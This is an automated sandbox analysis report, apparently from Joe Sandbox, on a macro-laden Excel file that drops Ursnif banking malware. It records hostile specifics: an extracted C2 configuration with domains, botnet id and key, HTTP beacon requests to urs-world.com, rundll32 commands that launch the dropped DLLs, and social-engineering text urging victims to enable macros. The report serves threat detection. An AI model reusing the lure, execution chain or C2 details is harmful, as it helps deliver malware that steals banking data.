Analysis Report document-1771131239.xls

Overview

General Information

Sample Name: document-1771131239.xls
Analysis ID: 381643
MD5: b058594669b275d186207929b4b32eeb
SHA1: f48e30b9e13cec95978232da40f1d2c279e91191
SHA256: 00a55a2ef2774d581e152e154a34e07fb231a4d5f0fc17a3cb1726fa02843243
Tags: IcedIDxls
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Ursnif
Yara detected Ursnif
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Found obfuscated Excel 4.0 Macro
Machine Learning detection for dropped file
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Writes registry values via WMI
Yara detected hidden Macro 4.0 in Excel
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Uses code obfuscation techniques (call, push, ret)
Yara detected Xls With Macro 4.0
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: 7.2.rundll32.exe.240000.1.raw.unpack Malware Configuration Extractor: Ursnif [[{"RSA Public Key": "Om1HeBhXBR6NHvmWFG5B2kyl5mdcRMsb8ux2uo9VgGW0O2LzHZKk3w9bxw9stgphU0ayytcOYkK6GCNJlKSeMTZJ5WPgZiX+MaXiUccStEUTXkW1ubp0gdr16sb5U4M+rzWWPvc3s7bj9o1yqSJtP7PmMVp7E+3llLULQ9/DZbAD7SXaft6wcY8wFjSkI+8D"}, {"c2_domain": ["bing.com", "update4.microsoft.com", "under17.com", "urs-world.com"], "botnet": "5566", "server": "12", "serpent_key": "10301029JSJUYDWG", "sleep_time": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}]]
Multi AV Scanner detection for domain / URL
Source: accesslinksgroup.com Virustotal: Detection: 8% Perma Link
Multi AV Scanner detection for submitted file
Source: document-1771131239.xls Virustotal: Detection: 43% Perma Link
Source: document-1771131239.xls Metadefender: Detection: 16% Perma Link
Source: document-1771131239.xls ReversingLabs: Detection: 18%
Machine Learning detection for dropped file
Source: C:\Users\user\fikftkm.thj2 Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gif Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 7.2.rundll32.exe.1e0000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen3
Source: 7.2.rundll32.exe.10000000.11.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 207.174.213.126:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.241.62.4:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown HTTPS traffic detected: 192.185.129.4:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown HTTPS traffic detected: 5.100.155.169:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown HTTPS traffic detected: 198.50.218.68:443 -> 192.168.2.22:49172 version: TLS 1.2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_003112D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 7_2_003112D4

Software Vulnerabilities:

barindex
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: 0104[1].gif.0.dr Jump to dropped file
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe

Networking:

barindex
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 207.174.213.126 207.174.213.126
Source: Joe Sandbox View IP Address: 162.241.62.4 162.241.62.4
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ Jump to behavior
Source: global traffic HTTP traffic detected: GET /joomla/3aDSi90Odm4t/ZQseS7mEKQ6/SSE8Q3crCb0l7w/wIvpan0x1HXuZM3ORESMa/ajJiFPV258iNRovg/KQl9frzLJWGuawc/zcW8IHCp_2F8n02ZSX/SkuilVzI4/iu_2BjoqlDfmKu_2BuVf/kGitIl_2Bi7_2Fz9R6X/Y0sd4k8W3UrfPrzXwVLvdK/7G4iHN0OcM5_2/FPqyROS_/2BKDOK08.akk HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: urs-world.comDNT: 1Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: urs-world.comDNT: 1Connection: Keep-AliveCookie: PHPSESSID=ca3tpsqcuj8l4okgqq21dsnjv6; lang=en
Source: global traffic HTTP traffic detected: GET /joomla/nFzk0Q7K/E1_2F1CEOHcU967kDpuCuCt/FPWRV6etYO/3uHaVD2_2B5fz4cnT/KUnSOvHj3DDx/LEjym6jOHzl/FeVIuhKblVVnxm/VI6rPV0WA0nCSJBKKjggZ/tlqJBc8y5_2Bbir_/2BCa9ubsQQgGaAg/T_2BNOyNXybfs33Qg4/rm7s6e4PI/6eyckn37N5jlypeo4jei/kAPiG95T_2BrCVeX6k0/F0E8zUcKkiS/aU.akk HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: urs-world.comDNT: 1Connection: Keep-AliveCookie: lang=en
Source: global traffic HTTP traffic detected: GET /joomla/DzJ1zVBWb/1fmYW7HPNqRQhz6Za_2F/CEQgEHh67hkPdvwOSdi/nEqyJXm1CwTWVs2C_2Fr_2/BvjUBKxN9qSpN/cMrTRJ9N/ryJsB4qGY2XHLtxrLDi6xNR/Qw5QsDCu2a/1byqzLlxunqNEdxwm/2jiPBdqZB0a1/q3egY2VhZv3/_2B8x5gL2kXG3P/aL1YXODRbtNtTkBrj3PS7/G.akk HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: urs-world.comDNT: 1Connection: Keep-AliveCookie: lang=en
Source: rundll32.exe, 00000003.00000002.2109683040.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103517881.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2424346392.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2424533316.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2170906273.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2164816760.0000000001CE0000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: vts.us.com
Source: rundll32.exe, 00000003.00000002.2109683040.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103517881.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2424346392.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2424533316.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2170906273.0000000001CB0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2109683040.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103517881.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2424346392.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2424533316.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2170906273.0000000001CB0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2109901553.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103722699.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2424538357.0000000001D47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2424698718.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2171130239.0000000001E97000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2109901553.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103722699.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2424538357.0000000001D47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2424698718.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2171130239.0000000001E97000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2109901553.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103722699.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2424538357.0000000001D47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2424698718.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2171130239.0000000001E97000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000007.00000002.2424493399.0000000000960000.00000002.00000001.sdmp String found in binary or memory: http://urs-world.com/joomla/DzJ1zVBWb/1fmYW7HPNqRQhz6Za_2F/CEQgEHh67hkPdvwOSdi/nEqyJXm1CwTWVs2C
Source: rundll32.exe, 00000003.00000002.2109901553.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103722699.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2424538357.0000000001D47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2424698718.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2171130239.0000000001E97000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2109683040.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103517881.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2424346392.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2424533316.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2170906273.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2164816760.0000000001CE0000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2109901553.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103722699.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2424538357.0000000001D47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2424698718.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2171130239.0000000001E97000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2109683040.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103517881.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2424346392.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2424533316.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2170906273.0000000001CB0000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000009.00000002.2164816760.0000000001CE0000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown HTTPS traffic detected: 207.174.213.126:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.241.62.4:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown HTTPS traffic detected: 192.185.129.4:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown HTTPS traffic detected: 5.100.155.169:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown HTTPS traffic detected: 198.50.218.68:443 -> 192.168.2.22:49172 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000007.00000002.2424277771.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.10000000.11.unpack, type: UNPACKEDPE
Yara detected Ursnif
Source: Yara match File source: 00000007.00000002.2425909457.0000000002DD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2230212772.0000000002C5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2368154248.0000000002B5D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2416009611.0000000002A5F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2996, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000007.00000002.2424277771.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.10000000.11.unpack, type: UNPACKEDPE
Yara detected Ursnif
Source: Yara match File source: 00000007.00000002.2425909457.0000000002DD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2230212772.0000000002C5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2368154248.0000000002B5D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2416009611.0000000002A5F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2996, type: MEMORY

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, please clic 14
Source: Screenshot number: 8 Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, please clic 14 R
Source: Screenshot number: 12 Screenshot OCR: Enable Editing, please click Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18
Source: Screenshot number: 12 Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
Source: Document image extraction number: 9 Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
Source: Document image extraction number: 9 Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Document image extraction number: 15 Screenshot OCR: Enable Editing from the yellow bar above CB Once You have Enable Editing, please click Enable Cont
Source: Document image extraction number: 15 Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? W You are using IDS or And
Source: Screenshot number: 16 Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, please click Enab
Source: Screenshot number: 16 Screenshot OCR: Enable Content 14 from the yellow bar above 15 16 17 18 WHY I CANNOTOPEN THIS DOCUMENT? 19 2
Found Excel 4.0 Macro with suspicious formulas
Source: document-1771131239.xls Initial sample: CALL
Source: document-1771131239.xls Initial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheet
Source: document-1771131239.xls Initial sample: Sheet size: 4081
Source: document-1771131239.xls Initial sample: Sheet size: 12790
Found obfuscated Excel 4.0 Macro
Source: document-1771131239.xls Initial sample: High usage of CHAR() function: 40
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\fikftkm.thj2 Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gif Jump to dropped file
Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001D9F NtMapViewOfSection, 7_2_10001D9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001EB5 GetProcAddress,NtCreateSection,memset, 7_2_10001EB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002375 NtQueryVirtualMemory, 7_2_10002375
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_003183B7 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 7_2_003183B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0031B341 NtQueryVirtualMemory, 7_2_0031B341
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E348F 7_2_001E348F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1918 7_2_001E1918
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E3314 7_2_001E3314
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1000 7_2_001E1000
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E6424 7_2_001E6424
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E4859 7_2_001E4859
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E554B 7_2_001E554B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E237B 7_2_001E237B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E247B 7_2_001E247B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E5C76 7_2_001E5C76
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1374 7_2_001E1374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E596E 7_2_001E596E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E1B95 7_2_001E1B95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E3A85 7_2_001E3A85
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E3FA8 7_2_001E3FA8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E3BDB 7_2_001E3BDB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E5AF6 7_2_001E5AF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E20EE 7_2_001E20EE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E52EC 7_2_001E52EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001E28EB 7_2_001E28EB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002154 7_2_10002154
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_003144A2 7_2_003144A2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00314094 7_2_00314094
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0031B11C 7_2_0031B11C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0031554A 7_2_0031554A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_003127A7 7_2_003127A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_003197F2 7_2_003197F2
Document contains embedded VBA macros
Source: document-1771131239.xls OLE indicator, VBA macros: true
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gif A05711289E9F8DBA5F0CE5FE3B3096F8C181F537D169997E2DB30F83036052D3
Source: Joe Sandbox View Dropped File: C:\Users\user\fikftkm.thj2 A05711289E9F8DBA5F0CE5FE3B3096F8C181F537D169997E2DB30F83036052D3
Yara signature match
Source: document-1771131239.xls, type: SAMPLE Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: document-1771131239.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: rundll32.exe, 00000003.00000002.2109683040.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2103517881.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2424346392.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2424533316.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2170906273.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2164816760.0000000001CE0000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@26/72@10/7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0031757F CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 7_2_0031757F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00317B5D SetWaitableTimer,CoCreateInstance,CoSetProxyBlanket, 7_2_00317B5D
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\D5CE0000 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRBCAA.tmp Jump to behavior
Source: document-1771131239.xls OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj,DllRegisterServer
Source: document-1771131239.xls Virustotal: Detection: 43%
Source: document-1771131239.xls Metadefender: Detection: 16%
Source: document-1771131239.xls ReversingLabs: Detection: 18%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj2,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj2,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj3,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj4,DllRegisterServer
Source: unknown Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:620 CREDAT:275457 /prefetch:2
Source: unknown Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3064 CREDAT:275457 /prefetch:2
Source: unknown Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:972 CREDAT:275457 /prefetch:2
Source: C:\Program Files\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:972 CREDAT:603152 /prefetch:2
Source: C:\Program Files\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:972 CREDAT:1520647 /prefetch:2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj,DllRegisterServer Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj1,DllRegisterServer Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj2,DllRegisterServer Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj3,DllRegisterServer Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj4,DllRegisterServer Jump to behavior
